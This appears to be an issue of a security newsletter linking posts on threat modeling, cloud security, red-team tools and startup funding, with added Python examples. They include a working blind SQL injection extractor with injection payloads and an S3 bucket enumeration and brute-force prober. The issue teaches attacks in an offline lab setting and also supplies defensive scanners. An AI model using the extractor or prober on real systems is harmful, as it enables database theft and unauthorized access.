
[tl;dr sec] #78 - Scaling Threat Modeling at Segment, Bootstrapping vs VCs, Security as Value Unlock


tl;dr sec is a newsletter about AppSec and scaling security, automated bug finding, conference talk and paper summaries, and useful links from around the web. You can subscribe here and see past issues here.

(You can also read this issue on our blog.)

Hey there,

I hope you’ve been doing well!

Slogans that are not Security Companies but Should Be

I was taking a walk recently and I saw some branding that made me do a double take: it was a plumbing company that had the perfect slogan for an infosec company.

I walked up, took a picture, and then scurried strutted away when I realized that there were two people still sitting inside.

“Uhh… what are you doing?” one of them asked. “Oh, I just really like the design.” And then I meandered away, full of joy.

Sponsor

  📢 How the history of SaaS is preventing businesses from embracing modern SaaS security 

Businesses are investing more heavily in SaaS, but investment in SaaS security is lagging. Why? Much of the answer lies in the history of early SaaS applications, many of which were sold to individual business units, completely bypassing IT and security teams. Today, SaaS has grown to be a major part of the legitimate tech stack, but its origin as shadow IT still haunts organizations and prevents SaaS security from being correctly prioritized. AppOmni CEO Brendan O’Connor details four ways to modernize SaaS security processes. Originally published as a feature in SC Media.

📜 In this newsletter...

🔗 Links:

  • AppSec: How Segment is scaling threat modeling, Semgrep now has first-class YAML support

  • Web Security: Automating blind SQLi over websocket

  • Cloud Security: PMapper update, another IaC static analysis tool, HackerOne's first AWS CTF, attacking and auditing S3 buckets

  • Red Team: Free reverse engineering course, intercepting mTLS of Java thick clients, tool for macOS persistence

  • Neat CLI tools: Find files with SQL-like queries, exa, a better ls, problems you can solve with strace

  • Bootstrapping vs VCs: Thinkst has bootstrapped to $11M ARR, a story of a bootstrapped company trying to compete with a VC-backed one, DHH weighs in, Hamilton parody of the situation

  • Chaos Engineering: What computer security can learn from safety and complex systems research in other fields

  • Security as Value Unlocker: Minimizing risk is setting your sights too low, security can unlock significant business value

AppSec

Redefining Threat Modeling: Security team goes on vacation
Great post by Segment’s Jeevan Saini. Similar to what Jacob Salassi and I discussed in our blog post, Segment realized they needed developers to lead threat modeling if they were truly going to scale. This post gives a nice overview of the problem space and details on how they actually rolled out their program, and they’ve open-sourced their threat modeling training slides. As the kids say these days- yeet!

How we made Semgrep rules run on Semgrep rules
By r2c’s Emma Jin: Semgrep now has first-class support for anything YAML, which includes Kubernetes configs, CircleCI workflows, and more. You can even lint Semgrep rules with… more Semgrep rules! (yo dawg, I heard you like… 🤣). The post also has some neat info about implementation details, if you’re curious to get a peek at Semgrep internals.

Web Security

Automating Blind SQL injection over WebSocket
Blog post by Rayhan Ahmed, who has also released a vulnerable NodeJS web app that you can practice on.
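To make the technique concrete, here is the core of an automated boolean-based blind extractor. This is an added example, not Rayhan Ahmed’s code or his practice app: the transport is a plain callable that answers True/False for one injected value, so the same loop drives a WebSocket message (for example via the `websockets` package, an assumption) just as well as an HTTP request. A sqlite3-backed stand-in, constructed here, plays the vulnerable app so the script runs offline.

```python
"""Boolean-based blind SQL injection extractor with a pluggable transport.
Added example; the target below is a constructed stand-in, not the post's app."""
import sqlite3
from typing import Callable, Tuple

# The oracle takes the attacker-controlled string and returns whether the
# application signalled "match" (login OK, row found, ...) for it.
Oracle = Callable[[str], bool]


def make_vulnerable_app() -> Oracle:
    """Constructed target: string-concatenated SQL, and the only feedback is
    whether the lookup matched, exactly the situation in a blind injection.
    In the real case this function would send a WebSocket frame and parse the reply."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 's3cr3t!pass');
    """)

    def handle_login(username: str) -> bool:
        sql = "SELECT 1 FROM users WHERE username = '" + username + "'"  # injectable on purpose
        return db.execute(sql).fetchone() is not None

    return handle_login


def blind_extract(oracle: Oracle, subquery: str, max_len: int = 64) -> Tuple[str, int]:
    """Recover the result of `subquery` one character at a time.

    For each position we bisect the ASCII range 0..127 by asking
    "is unicode(substr(result, pos, 1)) > mid?", so every character costs
    exactly 7 requests instead of up to 95 linear guesses. Past the end of
    the string substr() yields NULL, every comparison is false, the search
    collapses to 0 and extraction stops. Returns (value, requests_sent).
    """
    recovered, requests = [], 0
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # sqlite syntax; the trailing "-- " comments out the closing quote
            payload = f"' OR unicode(substr(({subquery}),{pos},1)) > {mid} -- "
            requests += 1
            if oracle(payload):
                lo = mid + 1      # character code is above mid
            else:
                hi = mid          # character code is mid or below (or NULL)
        if lo == 0:
            break                 # NULL: we ran off the end of the value
        recovered.append(chr(lo))
    return "".join(recovered), requests


if __name__ == "__main__":
    app = make_vulnerable_app()
    secret, n = blind_extract(app, "SELECT password FROM users LIMIT 1")
    print(f"recovered {secret!r} in {n} requests")
```

The 7-requests-per-character bound is what makes automation worthwhile over a chatty transport; if the app’s "true" and "false" replies differ only in timing or in a subtle field of the WebSocket message, that distinction belongs inside the oracle, and the extraction loop does not change.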

Cloud Security

Principal Mapper v1.1.0 Update
By NCC Group’s Erik Steringer: PMapper, an IAM permission analysis tool, now supports AWS Organizations as well as other types of policies: Service Control Policies (SCPs), Session Policies, Resource Policies, and Permission Boundaries.
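What makes those policy types hard to reason about by hand is that they combine differently: an SCP or a permission boundary can only cap what an identity policy grants, and an explicit Deny in any of them wins. The toy evaluator below, an added example and not PMapper’s code, walks that decision in the order AWS documents it. It ignores conditions, NotResource, principal matching, and the same-account resource-policy special cases; the policies at the bottom are constructed.

```python
"""Toy walk through AWS's authorization decision for one (action, resource),
combining identity policies, SCPs, a permission boundary, a session policy and
a resource policy. Added example; simplified, not PMapper's evaluator."""
from fnmatch import fnmatchcase
from typing import Optional


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _action_matches(pattern: str, action: str) -> bool:
    # IAM action names are case-insensitive; '*' and '?' are the only wildcards.
    return fnmatchcase(action.lower(), pattern.lower())


def _resource_matches(pattern: str, resource: str) -> bool:
    # ARNs are treated as case-sensitive here (the real rules vary per service).
    return fnmatchcase(resource, pattern)


def _statement_applies(stmt: dict, action: str, resource: str) -> bool:
    if "Action" in stmt:
        if not any(_action_matches(p, action) for p in _as_list(stmt["Action"])):
            return False
    elif "NotAction" in stmt:
        if any(_action_matches(p, action) for p in _as_list(stmt["NotAction"])):
            return False
    else:
        return False
    return any(_resource_matches(p, resource) for p in _as_list(stmt.get("Resource", "*")))


def evaluate_policy(policy: dict, action: str, resource: str) -> Optional[str]:
    """'Deny' if any matching statement denies, 'Allow' if one allows, else None."""
    decision = None
    for stmt in _as_list(policy.get("Statement", [])):
        if not _statement_applies(stmt, action, resource):
            continue
        if stmt.get("Effect") == "Deny":
            return "Deny"
        decision = "Allow"
    return decision


def is_authorized(action, resource, identity_policies, scp_levels=(),
                  permission_boundary=None, session_policy=None,
                  resource_policy=None) -> bool:
    """scp_levels: one list of SCPs per OU level from the root down to the account."""
    scps = [p for level in scp_levels for p in level]
    filters = [p for p in (permission_boundary, session_policy) if p is not None]
    everything = list(identity_policies) + scps + filters + ([resource_policy] if resource_policy else [])

    # 1. An explicit Deny in any policy type always wins.
    if any(evaluate_policy(p, action, resource) == "Deny" for p in everything):
        return False
    # 2. SCPs: every level must contain an Allow (levels are ANDed, the
    #    policies attached at one level are ORed). Not applied to the management account.
    for level in scp_levels:
        if not any(evaluate_policy(p, action, resource) == "Allow" for p in level):
            return False
    # 3. A permission boundary or session policy never grants; it only caps.
    for f in filters:
        if evaluate_policy(f, action, resource) != "Allow":
            return False
    # 4. Something still has to grant the action.
    if any(evaluate_policy(p, action, resource) == "Allow" for p in identity_policies):
        return True
    return resource_policy is not None and evaluate_policy(resource_policy, action, resource) == "Allow"


# Constructed policies for a developer principal in a member account.
DEVELOPER_POLICY = {"Statement": [{"Effect": "Allow", "Action": "s3:*",
                                   "Resource": ["arn:aws:s3:::reports", "arn:aws:s3:::reports/*"]}]}
BOUNDARY = {"Statement": [{"Effect": "Allow", "Action": ["s3:Get*", "s3:List*"], "Resource": "*"}]}
ROOT_SCP = [{"Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}]}]   # FullAWSAccess
OU_SCP = [{"Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"},
                         {"Effect": "Deny", "Action": "s3:DeleteBucket", "Resource": "*"}]}]
SCP_LEVELS = [ROOT_SCP, OU_SCP]


def check(action: str, resource: str = "arn:aws:s3:::reports/q1.csv") -> bool:
    return is_authorized(action, resource, [DEVELOPER_POLICY], SCP_LEVELS, BOUNDARY)


if __name__ == "__main__":
    for act in ("s3:GetObject", "s3:PutObject", "s3:DeleteBucket", "s3:ListBucket"):
        print(f"{act:16} -> {'ALLOW' if check(act) else 'DENY'}")
```

Run it and `s3:*` in the identity policy collapses to just the Get/List actions: the boundary silently drops `s3:PutObject`, and the OU-level SCP denies `s3:DeleteBucket` no matter what the account’s own policies say. That is the kind of result a graph tool like PMapper has to compute across every principal, which is why adding these policy types matters.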

Checkmarx/kics
A static analysis tool that can find security vulnerabilities, compliance issues, and misconfigurations in infrastructure as code. Currently supports: Terraform, Kubernetes, Docker, CloudFormation, Ansible, Helm.

AWS and HackerOne CTF
“Put your cloud skills to the test and participate in HackerOne’s first-ever AWS Capture the Flag on Monday, April 5th starting at 12:00 PM PT until Monday, April 12th 12:00 PM PT.” Learn how to escalate privileges through SSRF and elevate your access by exploiting misconfigurations of AWS services.

Cloud Storage Security: Attacking & Auditing
Payatu’s Vitthal Shinde describes a number of ways to enumerate S3 buckets and how to look for misconfigurations, including Google/GitHub dorking, bruteforce, certificate transparency logs, JavaScript, CNAMEs, and directory listing.
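Three of those sources reduce to the same plumbing: harvest bucket names from text you already have (JavaScript bundles, CNAME records), generate permutations for brute force, then classify what an unauthenticated GET on each candidate tells you. The script below is an added example, not from the Payatu post; the JavaScript snippet and the S3 replies are constructed so it runs offline, and the fetcher is injectable so `http_fetch` can be swapped in for a live run against buckets you are authorized to test.

```python
"""S3 bucket enumeration helpers: name harvesting, permutation wordlist, and
classification of unauthenticated listing attempts. Added example."""
import re
import xml.etree.ElementTree as ET
from typing import Callable, Dict, List, Tuple

# virtual-hosted style (bucket.s3[.region].amazonaws.com) or
# path style (s3[.region].amazonaws.com/bucket)
S3_URL_RE = re.compile(
    r"(?:([a-z0-9][a-z0-9.-]{1,61}[a-z0-9])\.s3(?:[.-][a-z0-9-]+)?\.amazonaws\.com"
    r"|s3(?:[.-][a-z0-9-]+)?\.amazonaws\.com/([a-z0-9][a-z0-9.-]{1,61}[a-z0-9]))",
    re.IGNORECASE,
)


def buckets_from_text(text: str) -> List[str]:
    """Bucket names referenced in JS bundles, HTML, or DNS/CNAME dumps."""
    names = {(m.group(1) or m.group(2)).lower() for m in S3_URL_RE.finditer(text)}
    return sorted(names)


AFFIXES = ("dev", "prod", "staging", "backup", "backups", "logs", "assets", "uploads", "static")


def candidate_names(keyword: str) -> List[str]:
    """Brute-force wordlist: keyword alone plus keyword/affix joined by '-', '.' or nothing."""
    names = {keyword}
    for affix in AFFIXES:
        for sep in ("-", ".", ""):
            names.add(f"{keyword}{sep}{affix}")
            names.add(f"{affix}{sep}{keyword}")
    return sorted(n for n in names if 3 <= len(n) <= 63)   # S3 name length limits


S3_NS = "{http://s3.amazonaws.com/doc/2006-03-01/}"


def classify(status: int, body: str) -> Tuple[str, List[str]]:
    """Map an unauthenticated GET on https://<bucket>.s3.amazonaws.com/ to a finding."""
    if status == 404:
        return "missing", []            # NoSuchBucket: the name is unclaimed
    if status == 403:
        return "exists-private", []     # AccessDenied: bucket exists, listing is not public
    if status == 200:
        try:
            root = ET.fromstring(body)
        except ET.ParseError:
            return "unknown", []
        if root.tag == S3_NS + "ListBucketResult":   # directory listing is world-readable
            return "public-listing", [k.text for k in root.iter(S3_NS + "Key")]
    return "unknown", []


Fetcher = Callable[[str], Tuple[int, str]]


def probe(bucket: str, fetch: Fetcher) -> Tuple[str, List[str]]:
    return classify(*fetch(f"https://{bucket}.s3.amazonaws.com/"))


def http_fetch(url: str) -> Tuple[int, str]:
    """Real fetcher (unauthenticated GET); not used by the offline demo."""
    import urllib.error
    import urllib.request
    try:
        with urllib.request.urlopen(url, timeout=10) as r:
            return r.status, r.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode("utf-8", "replace")


# Constructed sample data standing in for a captured JS bundle and for S3 replies.
SAMPLE_JS = """
var cdn = "https://acme-assets.s3.eu-west-1.amazonaws.com/app.js";
fetch("https://s3.amazonaws.com/acme-logs/latest.json");
// CNAME: files.acme.example -> files.acme.example.s3-website-us-east-1.amazonaws.com
"""
PUBLIC_LISTING = """<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
  <Name>acme-backup</Name><Contents><Key>config/prod.env</Key></Contents>
  <Contents><Key>dump.sql</Key></Contents></ListBucketResult>"""
FAKE_RESPONSES: Dict[str, Tuple[int, str]] = {
    "https://acme-backup.s3.amazonaws.com/": (200, PUBLIC_LISTING),
    "https://acme-assets.s3.amazonaws.com/": (403, "<Error><Code>AccessDenied</Code></Error>"),
}


def fake_fetch(url: str) -> Tuple[int, str]:
    return FAKE_RESPONSES.get(url, (404, "<Error><Code>NoSuchBucket</Code></Error>"))


if __name__ == "__main__":
    for name in buckets_from_text(SAMPLE_JS) + candidate_names("acme"):
        verdict, keys = probe(name, fake_fetch)   # swap in http_fetch for a live run
        if verdict != "missing":
            print(f"{name:28} {verdict} {keys}")
```

Note that a 403 is still a finding: the bucket exists, which is what the certificate-transparency and CNAME sources give you too, and it may be writable or readable per-object even though listing is denied. Those checks need additional requests (a HEAD on a guessed key, a PUT you are authorized to attempt) that this example leaves out.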

Red Team

mytechnotalent/Reverse-Engineering
A free comprehensive reverse engineering course covering x86, x64, 32-bit ARM & 64-bit ARM architectures by Kevin Thomas.

HowTo: intercept mutually-authenticated TLS communications of a Java thick client
Nice walkthrough by @SAERXCIT, which involves: dumping the password from the client to decrypt the private key from the ClientKeyStore, and loading a fake TrustStore in place of the legitimate ClientTrustStore to bypass pinning. See also Piergiovanni Cipolloni’s SSL pinning bypass in Android using Frida.

CyborgSecurity/PoisonApple
By Cyborg Security’s Austin Jackson: A CLI tool to perform various persistence mechanism techniques on macOS, designed to be used by threat hunters for cyber threat emulation purposes. Currently includes ~16 persistence mechanisms, including LaunchAgent, LoginHook, and more.
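The point of emulating persistence is to check that you would catch it, so here is the hunting side of the LaunchAgent mechanism. This is an added example, not Cyborg Security’s code: it scores a launchd job plist for the traits a hunter looks for (RunAtLoad/KeepAlive, an interpreter with an inline script, a program under a temp, shared or hidden path). The two plists at the bottom are constructed; on a real host you would point `scan_directory` at `~/Library/LaunchAgents` and the system LaunchAgents/LaunchDaemons directories.

```python
"""Score launchd job plists for common persistence traits. Added example,
defensive counterpart to what PoisonApple's LaunchAgent module emulates."""
import os
import plistlib
from typing import Dict, List

TRUSTED_ROOTS = ("/System/", "/usr/", "/Applications/", "/Library/Apple/", "/sbin/", "/bin/")
TEMP_OR_SHARED = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/")
INTERPRETERS = {"/bin/sh", "/bin/bash", "/bin/zsh", "/usr/bin/osascript",
                "/usr/bin/python3", "/usr/bin/perl"}


def launch_argv(job: dict) -> List[str]:
    """launchd runs either Program or ProgramArguments[0]."""
    if "Program" in job:
        return [job["Program"]] + list(job.get("ProgramArguments", [])[1:])
    return list(job.get("ProgramArguments", []))


def assess_launch_job(plist_bytes: bytes) -> Dict[str, object]:
    job = plistlib.loads(plist_bytes)        # handles both XML and binary plists
    argv = launch_argv(job)
    findings: List[str] = []
    if not argv:
        findings.append("no program defined")
    else:
        exe = argv[0]
        if not exe.startswith(TRUSTED_ROOTS):
            findings.append("program outside system/application paths")
        if any(arg.startswith(TEMP_OR_SHARED) for arg in argv):
            findings.append("references a temp or shared directory")
        if exe in INTERPRETERS and any(a in ("-c", "-e") for a in argv[1:]):
            findings.append("inline script passed to an interpreter")
        if any("/." in arg for arg in argv):
            findings.append("hidden path component")
    if job.get("RunAtLoad"):
        findings.append("RunAtLoad")
    if job.get("KeepAlive"):                  # bool or dict; either keeps it alive
        findings.append("KeepAlive (relaunches if killed)")
    if job.get("StartInterval"):
        findings.append(f"StartInterval={job['StartInterval']}s")
    return {"label": job.get("Label"), "argv": argv, "findings": findings}


def scan_directory(path: str) -> List[Dict[str, object]]:
    """Assess every .plist in a LaunchAgents/LaunchDaemons directory."""
    results: List[Dict[str, object]] = []
    if not os.path.isdir(path):
        return results
    for name in sorted(os.listdir(path)):
        if not name.endswith(".plist"):
            continue
        with open(os.path.join(path, name), "rb") as fh:
            try:
                results.append(assess_launch_job(fh.read()))
            except Exception as exc:          # a deliberately malformed plist is itself notable
                results.append({"label": name, "argv": [], "findings": [f"unparseable: {exc}"]})
    return results


# Constructed samples: an Apple-looking label that actually runs a hidden
# script out of /Users/Shared, and an ordinary app helper.
SUSPICIOUS_AGENT = plistlib.dumps({
    "Label": "com.apple.softwareupdate.helper",
    "ProgramArguments": ["/bin/sh", "-c", "/Users/Shared/.cache/agent"],
    "RunAtLoad": True,
    "KeepAlive": True,
})
BENIGN_AGENT = plistlib.dumps({
    "Label": "com.example.menubar",
    "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/helper"],
})

if __name__ == "__main__":
    for blob in (SUSPICIOUS_AGENT, BENIGN_AGENT):
        r = assess_launch_job(blob)
        print(r["label"], "->", r["findings"] or "nothing notable")
    for r in scan_directory(os.path.expanduser("~/Library/LaunchAgents")):
        print(r["label"], "->", r["findings"] or "nothing notable")
```

A label alone proves nothing (the suspicious sample borrows an Apple-style one), which is why the score is built from where the program lives and how it is launched rather than from the name.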

Neat CLI Tools

jhspetersson/fselect
Find files with SQL-like queries.

Why I use exa instead of ls on Linux
exa improves on ls with more features and better defaults. It uses colors to distinguish file types and metadata, and it knows about symlinks, extended attributes, and Git.

What problems do people solve with strace?
If you haven’t already heard of her work, Julia Evans writes great content (and fun zines) about various tech tools and concepts, highly recommended. People use strace to answer: where a program’s config file is, what other files a program depends on, why it’s hanging, stuck, or slow, what hidden permission errors it’s hitting, what CLI arguments are being used, why network connections are failing, and more.

Bootstrapping vs VCs

We bootstrapped to $11 million in ARR
Inspiring blog post by Haroon Meer about how Thinkst grew to $11M ARR with no external funding by focusing on solving customer problems, keeping promises, and great company culture. If you’re not familiar, Thinkst is one of the few security companies that users rave about, and Haroon is such a kind, humble, A+ dude. I couldn’t be happier for their success. Check this post for some great tips on culture, values, and also some trade-offs of not raising money. See also Haroon’s response to 👇

It’s hard to draw lessons from your own failures
By @DHH: “Wilkinson was inspired by our funding model – bootstrapped from consulting – but didn’t follow any of the principles that go with that model.”

Also, Martin Jambon shared this gem:

Chaos Engineering

Security Chaos Engineering: How to Security Differently
Verica’s Aaron Rinehart discusses computer security in relation to resiliency and robustness in other domains with complex systems. He includes a few references to other non-security domain work on complex systems, minimizing human error, and safety. There are a few high level ideas that I thought were pretty interesting:

  • Traditionally security focuses on counting security negatives: unpatched software, security log events, bugs, etc.

  • Instead, we should focus on security positives: capabilities that help keep systems in secure states, help us understand what’s going on, and prevent bad events.

  • Focus on adaptive capacity— the ability to respond, monitor, learn, and anticipate errors.

  • One common fallacy is we assume that when we wrote the policy, designed the system, and implemented the relevant security measures that we had an accurate understanding of how the entire system behaved to begin with.

Security as Value Unlocker

A few weeks ago I had the privilege of presenting some of my colleagues’ and my work on secure defaults and eliminating vulnerability classes at the Bay Area CSO Council (thanks Flee!).

There were some other great presentations and interesting free-form discussions, but one of my favorite parts was a comment by Adrian Ludwig (currently CISO at Atlassian, formerly Director of Android Security at Google), right at the end.

The following is my paraphrased version, sharing with Adrian’s permission:

Having your security team focus on minimizing risk is setting your sights too low. The goal of a security org should be to facilitate the types of experiences that weren’t possible until we had achieved that level of risk mitigation.

When I led Android security at Google, we had an incredibly high security bar. Why? We were building an OS, a platform upon which billion-dollar companies like Uber were being built. If we built a fundamentally insecure platform, all of these companies building on top of us would fail. Framing it this way caused us to view Android security very differently internally, and helped drive conversations with development teams and product.

The security of the platform you’re building unlocks business potential. This fundamentally changes the conversation with the business: it’s not about minimizing downside, it’s about unlocking upside.

Historically, different product groups and parts of the business meet at the table and come with the promise of “unlocking upside” and “unlimited potential,” while security shows up talking about “minimizing downside.” That’s why security hasn’t had a seat at the table. But no longer: building secure platforms can unlock massive business upside.

Thanks for reading!

Cheers,

Clint